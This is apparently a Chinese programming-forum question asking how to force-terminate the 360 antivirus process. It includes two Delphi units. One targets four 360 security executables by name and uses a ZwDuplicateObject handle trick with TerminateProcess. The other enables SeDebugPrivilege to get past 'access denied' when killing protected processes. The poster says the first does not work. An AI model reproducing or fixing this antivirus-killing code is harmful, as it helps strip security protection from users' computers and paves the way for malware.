比如说让程序结束进程中360sd.exe
获取权限,否则会拒绝访问,
要怎么写?
这段代码中……点击按钮后结束不了360进程!
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,TlHelp32;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt): LongInt stdcall; external 'NTDLL.DLL' name 'ZwDuplicateObject';
implementation
{$R *.dfm}
procedure Kill360();
const
Safepro:array[1..4] of PChar =('safeboxTray.exe','360Safe.exe','360safebox.exe','360tray.exe');
var
ContinueLoop : BOOL;
FSnapshotHandle : THandle;
pe : PROCESSENTRY32;
ProcessHandle: Longint;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize:=SizeOf(PROCESSENTRY32);
if (Process32First(FSnapshotHandle,pe)) then
begin
while (Process32Next(FSnapshotHandle,pe)) do
begin
if (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[1])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[2])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[3])) or (UpperCase(ExtractFileName(pe.szExeFile))=UpperCase(Safepro[4])) then
begin
ProcessHandle:=OpenProcess($400, False,pe.th32ProcessID);
ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1);
TerminateProcess(ProcessHandle,0);
end;
end;
end;
CloseHandle(FSnapshotHandle);
End;
procedure TForm1.Button1Click(Sender: TObject);
begin
Kill360();
end;
end.
还有这个`不知道哪个能用的~
unit Tlhelp323;
interface
uses
Windows,SysUtils,Tlhelp32;
function KillTask(ExeFileName: string): Integer; //关闭进程
function EnableDebugPrivilege: Boolean; //提升权限
function FindProcessId(ExeFileName: string):THandle; //查找进程
implementation
function FindProcessId(ExeFileName: string):THandle;
var
ContinueLoop:BOOL;
FSnapshotHandle:THandle;
FProcessEntry32:TProcessEntry32;
begin
result:=0;
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop:=Process32First(FSnapshotHandle,FProcessEntry32);
while integer(ContinueLoop)<>0 do
begin
if UpperCase(FProcessEntry32.szExeFile)=UpperCase(ExeFileName) then
begin
result:=FProcessEntry32.th32ProcessID;
break;
end;
ContinueLoop:=Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle (FSnapshotHandle);
end;
function KillTask(ExeFileName: string): Integer;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: boolean;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
Result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while Integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(
OpenProcess(PROCESS_TERMINATE,
BOOL(0),
FProcessEntry32.th32ProcessID),
0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
//但是对于服务程序,它会提示"拒绝访问".其实只要程序拥有Debug权限即可:
function EnableDebugPrivilege: Boolean;
function EnablePrivilege(hToken: Cardinal; PrivName: string; bEnable: Boolean): Boolean;
var
TP: TOKEN_PRIVILEGES;
Dummy: Cardinal;
begin
TP.PrivilegeCount := 1;
LookupPrivilegeValue(nil, pchar(PrivName), TP.Privileges[0].Luid);
if bEnable then
TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else TP.Privileges[0].Attributes := 0;
AdjustTokenPrivileges(hToken, False, TP, SizeOf(TP), nil, Dummy);Result := GetLastError = ERROR_SUCCESS;
end;
var
hToken: Cardinal;
begin
OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken);
result:=EnablePrivilege(hToken, 'SeDebugPrivilege', True);
CloseHandle(hToken);
end;
end.